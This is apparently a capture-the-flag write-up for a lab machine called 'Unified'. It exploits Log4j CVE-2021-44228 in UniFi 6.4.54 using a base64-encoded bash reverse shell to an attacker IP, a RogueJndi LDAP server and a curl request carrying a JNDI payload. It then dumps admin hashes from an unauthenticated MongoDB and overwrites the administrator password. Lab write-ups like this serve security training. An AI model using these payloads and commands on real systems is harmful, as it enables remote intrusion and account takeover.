---
title: Unified
published: true
tags: [Web, Databases, Injection, MongoDB, Java, Default Credentials, Code Injection]
---

After the initial Nmap scan we have 6 ports open

```
PORT     STATE SERVICE       REASON
22/tcp   open  ssh           syn-ack
6789/tcp open  ibm-db2-admin syn-ack
8080/tcp open  http-proxy    syn-ack
8443/tcp open  https-alt     syn-ack
8843/tcp open  unknown       syn-ack
8880/tcp open  cddbp-alt     syn-ack
```

we also find a unifi login 6.4.54 https://unified.htb:8443/manage/account/login?redirect=%2Fmanage

I have exploited this version of unifi once before it had the Log4j CVE-2021-44228 vulnerability.

Following <a href="https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi">sprocket security's</a> guide

Starting by installing maven and compiling the rogue-jndi, which is a LDAP server for JNDI injection attacks.

Once the Jar is compiled we  need to make a command to deliver the reverse shell. we craft this and base64 encode it.

- `echo 'bash -c bash -i >&/dev/tcp/10.10.16.193/6985 0>&1' | base64`

then insert into our rogue-JNDI command

- `java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTkzLzY5ODUgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.10.16.193"`

Then to get a reverse shell we can use this cURL command

- `curl -i -s -k -X POST -H $'Host: 10.129.207.100:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://10.10.16.193:1389/o=tomcat}\",\"strict\":true}' $'https://10.129.207.100:8443/manage/account/login'`

for whatever reason my curl request isnt working but capturing in burp and sending the payload through there gets us a reverse shell on 6985.

There is no python available on this machine to upgrade our shell but we can use `script /dev/null -c bash` to get the same effect.

Once we are inside the exploiters found that the MongoDB instance storing all of the application information is listening on localhost without authentication. That mean we can read from and make changed to the local MongoDB instance. we can extract password hashes, reset admin password, add a shadow admin. 

# Replacing admin password

Dump password hashes from local db. This command will dump a JSON array of users, privileges and password hashes.

- `mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"`

```
        "_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
        "name" : "administrator",
        "email" : "administrator@unified.htb",
        "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
```

create a new sha-512 pass `mkpasswd -m sha-512 password`

- `mongo --port 27117 ace --eval 'db.admin.update({"_id":
ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$12ZN9Uh2iuQRjoTM$jmc2jIzCTMPU.kFp7driwLcqqOh6rffa1zysWCai2WKy79JjMvpU/DmfRagkHeUZdlpmee6hP/wo.5.LialJw0"}})'`

we can then login and grab the root ssh password and get anything we need from the machine.